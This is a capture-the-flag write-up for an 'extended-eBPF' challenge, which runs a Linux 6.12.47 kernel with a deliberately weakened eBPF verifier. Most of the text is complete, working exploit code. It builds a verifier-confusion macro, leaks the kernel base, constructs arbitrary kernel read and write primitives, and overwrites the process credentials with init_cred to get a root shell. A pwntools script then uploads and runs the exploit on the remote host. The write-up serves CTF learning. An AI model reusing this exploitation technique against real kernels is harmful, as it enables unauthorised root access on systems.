
extended-eBPF

I extended the eBPF because it's cool.

Note: You can log in as the ctf user

nc 34.26.243.6 5000

Author: White

Reference Material

Analysis

We are provided a patched 6.12.47 Linux kernel image with the following patch file:

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 24ae8f33e5d7..e5641845ecc0 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -13030,7 +13030,7 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
 static bool can_skip_alu_sanitation(const struct bpf_verifier_env *env,
 				    const struct bpf_insn *insn)
 {
-	return env->bypass_spec_v1 || BPF_SRC(insn->code) == BPF_K;
+	return true;
 }
 
 static int update_alu_sanitation_state(struct bpf_insn_aux_data *aux,
@@ -14108,7 +14108,7 @@ static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
 	case BPF_LSH:
 	case BPF_RSH:
 	case BPF_ARSH:
-		return (src_is_const && src_reg->umax_value < insn_bitness);
+		return (src_reg->umax_value < insn_bitness);
 	default:
 		return false;
 	}

There are 2 main “extensions” in this patch:

  1. Bypass the ALU sanitation entirely.
  2. Allow marking non-constant shifts as “safe”.

As mentioned in the kernel source comments:

	/* Shift operators range is only computable if shift dimension operand
	 * is a constant. Shifts greater than 31 or 63 are undefined. This
	 * includes shifts by a negative number.
	 */
	case BPF_LSH:
	case BPF_RSH:
	case BPF_ARSH:
		return (src_is_const && src_reg->umax_value < insn_bitness);
	default:
		return false;

The reason for this is explained in the Intel 64 and IA-32 Architectures Software Developer's Manual, page 1783:

The destination operand can be a register or a memory location. The count operand can be an immediate value or
the CL register. The count is masked to 5 bits (or 6 bits if in 64-bit mode and REX.W is used). The count range is
limited to 0 to 31 (or 63 if 64-bit mode and REX.W is used). A special opcode encoding is provided for a count of 1.

This basically means that 1 >> 64 effectively becomes 1 >> (64 & 0b111111), which is 1 >> 0, which is 1 (quite different from our typical expectation of 0). This is problematic because it can become a source of disagreement between the eBPF verifier and the actual runtime execution on the CPU. This is exactly why shifts are so useful for us from an exploitation perspective.

The typical goal of an eBPF exploit (as I understand it) is to build reliable AAR (Arbitrary Address Read) and AAW (Arbitrary Address Write) primitives for a stable kernel exploit. Let's see how we can achieve this.

Exploit

To communicate between a kernel-space eBPF program and a user-space process, we usually use maps. Maps, as in other languages, store data as key-value pairs. We can obtain a kernel address leak inside the eBPF program fairly easily, but moving that leak into the map (so that we can later read it from userspace) is not so easy. The verifier is designed to block this specific scenario and will not allow any kernel addresses to reach the map data.

To solve this, we create confusion between the load-time verifier and the actual runtime execution on the CPU. I will explain it gradually with the help of the CONFUSE macro from my solution:

#define CONFUSE                                                                \
  BPF_MOV64_IMM(BPF_REG_0, 0), BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),  \
      BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),                                    \
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                    \
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                                   \
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), /* r0 = &map[0] */              \

BPF_FUNC_map_lookup_elem expects REG_1 to hold the map pointer and REG_2 to hold the address of the key. Hence we store 0 (the key) at R10 - 4.

REG_10 acts as the frame pointer

This gives us a NULLable reference to the map value.

      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),   /* if r0 == NULL: exit */       \
      BPF_EXIT_INSN(),                         /* r0 = map_value_ptr */        \

Then we prove to the verifier that the resulting reference is not NULL, by exiting early when it is.

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),                                     \
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),                            \

Then we back up the reference into REG_6 and dereference the pointer to load the map value into REG_0. Since the map value can change at runtime, the verifier does not know its bounds. But we can "force" it to be bounded like this:

      BPF_JMP_IMM(BPF_JLE, BPF_REG_0, 1, 1),                                   \
      BPF_EXIT_INSN(), /* execution: r0 = 1 ; verifier: r0 = [0,1] */          \

This will make the verifier believe that REG_0 is definitely <= 1.

Remember that we manually set the map value to 1, so this assumption holds at this point.

Now finally let’s trigger the bug:

      BPF_MOV64_IMM(BPF_REG_1, 1),                                             \
      BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_0),                            \
      /* ^^^ vuln: r1 bounds do NOT get updated */ /* execution:               \
                                                      r1 = 0 ;                 \
                                                      verifier:                \
                                                      r1 = 1                   \
                                                    */                         \
      BPF_ALU64_IMM(                                                           \

We do 1 >> [0, 1]. Because non-constant shifts are now allowed, this operation gets marked as "safe" and the verifier does NOT update the bounds of REG_1. The verifier therefore still thinks REG_1 is 1, whereas at runtime, since we set REG_0 = 1, REG_1 actually becomes 0.

It would be more convenient to have the confusion the other way around (runtime 1, verifier 0), so let's invert it:

      BPF_ALU64_IMM(                                                           \
          BPF_SUB, BPF_REG_1,                                                  \
          1), /* execution: r1 = 0xffffffffffffffff ; verifier: r1 = 0 */      \
      BPF_ALU64_IMM(BPF_AND, BPF_REG_1,                                        \
                    1) /* execution: r1 = 1 ; verifier: r1 = 0 */

By subtracting 1 and then AND-masking with 1, we invert the confusion: the verifier now believes REG_1 is 0, whereas in reality it is 1.

The beauty is that we can now multiply this confused register by any value and add the result as an "offset" to the map reference. The verifier allows it, since it thinks the offset is still 0, which gives us arbitrary reads and writes relative to the map.

This way we can get KASLR leaks:

void get_leaks(void) {
  oob_map_fd = bpf_map_create(4, 0x150, 1);

  bpf_map_update_elem(oob_map_fd, 0, 1);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -OFF_MAP_VALUES),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 8),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, OFF_MAP_SELF_LOOP),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 16),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  uint64_t ops_leak = bpf_map_lookup_elem(oob_map_fd, 0, 1);
  INFO("ops_leak = %#lx", ops_leak);
  UPDATE_KBASE(ops_leak - OFF_KBASE_OPS);
  SUCCESS("kbase = %#lx", KBASE);
  init_task = KBASE_OFFSET(OFF_INIT_TASK);
  INFO("init_task = %#lx", init_task);
  init_cred = KBASE_OFFSET(OFF_INIT_CRED);
  INFO("init_cred = %#lx", init_cred);
  oob_map_leak = bpf_map_lookup_elem(oob_map_fd, 0, 2) - OFF_MAP_SELF_LOOP;
  SUCCESS("oob_map_leak = %#lx", oob_map_leak);
}

Furthermore, once we have basic leaks, we can build more powerful read/write primitives like this:

uint64_t arb_read(uint64_t addr) {
  uint64_t offset = addr - oob_map_leak - OFF_MAP_VALUES;
  read_map_fd = bpf_map_create(4, 0x150, 1);
  bpf_map_update_elem(read_map_fd, 0, offset);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, read_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 8),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  return bpf_map_lookup_elem(oob_map_fd, 0, 1);
}

void arb_write(uint64_t addr, uint64_t value) {
  uint64_t offset = addr - oob_map_leak - OFF_MAP_VALUES;
  write_map_fd = bpf_map_create(4, 0x150, 2);
  bpf_map_update_elem(write_map_fd, 0, offset);
  bpf_map_update_elem(write_map_fd, 1, value);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
      /* ^^^ save offset to r8 */
      BPF_MOV64_IMM(BPF_REG_0, 1),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = value */
      BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),
      /* ^^^ save value to r9 */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_8),
      /* ^^^ restore offset */
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_9),
      /* ^^^ restore value */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_2, 0),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
}

Once we have leaks and read/write primitives, we can quickly traverse the task list and replace current->cred with &init_cred:

int main() {
  get_leaks();
  uint64_t curr_task =
      arb_read(init_task + OFF_TASK_STRUCT_PREV_TASK) - OFF_TASK_STRUCT_TASKS;
  INFO("curr_task = %#lx", curr_task);
  arb_write(curr_task + OFF_TASK_STRUCT_CRED, init_cred);
  win();
  real_pause();
}

The full exploit is shared below:

#include "bpf_stuff.h"
#include "kpwn/log.h"
#include "kpwn/core.h"

int oob_map_fd, read_map_fd, write_map_fd;
uint64_t oob_map_leak, init_task, init_cred;

enum offsets {
  OFF_MAP_VALUES = 0xf8,
  OFF_MAP_SELF_LOOP = 0x70,
  OFF_KBASE_OPS = 0xc1d9a0,
  OFF_INIT_TASK = 0x100a940,
  OFF_INIT_CRED = 0x103fd80,
  OFF_TASK_STRUCT_TASKS = 0x390,
  OFF_TASK_STRUCT_PREV_TASK = 0x398,
  OFF_TASK_STRUCT_CRED = 0x638,

};

#define CONFUSE                                                                \
  BPF_MOV64_IMM(BPF_REG_0, 0), BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),  \
      BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd),                                    \
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                    \
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                                   \
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem), /* r0 = &map[0] */              \
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),   /* if r0 == NULL: exit */       \
      BPF_EXIT_INSN(),                         /* r0 = map_value_ptr */        \
      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),                                     \
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),                            \
      BPF_JMP_IMM(BPF_JLE, BPF_REG_0, 1, 1),                                   \
      BPF_EXIT_INSN(), /* execution: r0 = 1 ; verifier: r0 = [0,1] */          \
      BPF_MOV64_IMM(BPF_REG_1, 1),                                             \
      BPF_ALU64_REG(BPF_RSH, BPF_REG_1, BPF_REG_0),                            \
      /* ^^^ vuln: r1 bounds do NOT get updated */ /* execution:               \
                                                      r1 = 0 ;                 \
                                                      verifier:                \
                                                      r1 = 1                   \
                                                    */                         \
      BPF_ALU64_IMM(                                                           \
          BPF_SUB, BPF_REG_1,                                                  \
          1), /* execution: r1 = 0xffffffffffffffff ; verifier: r1 = 0 */      \
      BPF_ALU64_IMM(BPF_AND, BPF_REG_1,                                        \
                    1) /* execution: r1 = 1 ; verifier: r1 = 0 */

void get_leaks(void) {
  oob_map_fd = bpf_map_create(4, 0x150, 1);

  bpf_map_update_elem(oob_map_fd, 0, 1);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -OFF_MAP_VALUES),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 8),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, OFF_MAP_SELF_LOOP),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 16),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  uint64_t ops_leak = bpf_map_lookup_elem(oob_map_fd, 0, 1);
  INFO("ops_leak = %#lx", ops_leak);
  UPDATE_KBASE(ops_leak - OFF_KBASE_OPS);
  SUCCESS("kbase = %#lx", KBASE);
  init_task = KBASE_OFFSET(OFF_INIT_TASK);
  INFO("init_task = %#lx", init_task);
  init_cred = KBASE_OFFSET(OFF_INIT_CRED);
  INFO("init_cred = %#lx", init_cred);
  oob_map_leak = bpf_map_lookup_elem(oob_map_fd, 0, 2) - OFF_MAP_SELF_LOOP;
  SUCCESS("oob_map_leak = %#lx", oob_map_leak);
}

uint64_t arb_read(uint64_t addr) {
  uint64_t offset = addr - oob_map_leak - OFF_MAP_VALUES;
  read_map_fd = bpf_map_create(4, 0x150, 1);
  bpf_map_update_elem(read_map_fd, 0, offset);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, read_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 8),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
  return bpf_map_lookup_elem(oob_map_fd, 0, 1);
}

void arb_write(uint64_t addr, uint64_t value) {
  uint64_t offset = addr - oob_map_leak - OFF_MAP_VALUES;
  write_map_fd = bpf_map_create(4, 0x150, 2);
  bpf_map_update_elem(write_map_fd, 0, offset);
  bpf_map_update_elem(write_map_fd, 1, value);
  struct bpf_insn insns[] = {
      CONFUSE,
      BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
      /* ^^^ save confusion to r7 */
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = offset */
      BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
      /* ^^^ save offset to r8 */
      BPF_MOV64_IMM(BPF_REG_0, 1),
      BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
      BPF_LD_MAP_FD(BPF_REG_1, write_map_fd),
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
      BPF_CALL_FUNC(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
      /* ^^^ r0 = value */
      BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),
      /* ^^^ save value to r9 */
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
      /* ^^^ restore confusion */
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_8),
      /* ^^^ restore offset */
      BPF_MOV64_REG(BPF_REG_2, BPF_REG_9),
      /* ^^^ restore value */
      BPF_ALU64_REG(BPF_MUL, BPF_REG_1, BPF_REG_0),
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
      BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_2, 0),
      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };
  run_bpf_prog(insns, sizeof(insns) / sizeof(insns[0]));
}

void win(void) {
  if (getuid() != 0) {
    ERROR("Failed to get root");
  } else {
    SUCCESS("Got root");
  }
  puts("Here is your shell...");
  system("/bin/sh");
}

int main() {
  get_leaks();
  uint64_t curr_task =
      arb_read(init_task + OFF_TASK_STRUCT_PREV_TASK) - OFF_TASK_STRUCT_TASKS;
  INFO("curr_task = %#lx", curr_task);
  arb_write(curr_task + OFF_TASK_STRUCT_CRED, init_cred);
  win();
  real_pause();
}

We can upload this to the remote and get the flag with the following helper script:

#!/usr/bin/env python

from pwn import *
from gzip import GzipFile
from io import BytesIO
from tqdm import tqdm
from os import system
from subprocess import check_output

system('gcc -s -o ./exploit ./solve/solve.c ./solve/kpwn/*.c')

# Edit these
host = '34.26.243.6'
port = 5000

def chunk_exploit(exploit, chunk_size=500):
    for i in range(0, len(exploit), chunk_size):
        yield exploit[i:i+chunk_size]

exploit = BytesIO()
with open('./exploit', 'rb') as f_in:
    with GzipFile(fileobj=exploit, mode='wb') as f_out:
        f_out.write(f_in.read())
exploit = exploit.getvalue()
exploit = b64e(exploit)

if args.REMOTE:
    io = remote(host, port)
    log.info('Solving PoW')
    io.recvuntil(b'proof of work:\n')
    pow = io.recvline().strip()
    res = check_output(pow, shell=True)
    io.sendline(res)
    log.success('Done')
else:
    io = process('./start-qemu.sh')

log.info('Waiting for vm to load...')
io.recvuntil(b'Welcome to Buildroot')
io.sendlineafter(b'login: ', b'ctf')
sleep(1)
chunks = list(chunk_exploit(exploit))
for chunk in tqdm(chunks, desc="Uploading exploit", unit="chunk"):
    io.sendline(f'echo -n "{chunk}" >> exploit.gz.b64'.encode())
    io.recvuntil(b'$')
io.sendline(b'base64 -d exploit.gz.b64 > exploit.gz')
io.sendline(b'gunzip exploit.gz')
io.sendline(b'chmod +x exploit')
io.clean()
io.sendline(b'./exploit')
io.interactive()

This post is licensed under CC BY 4.0 by the author.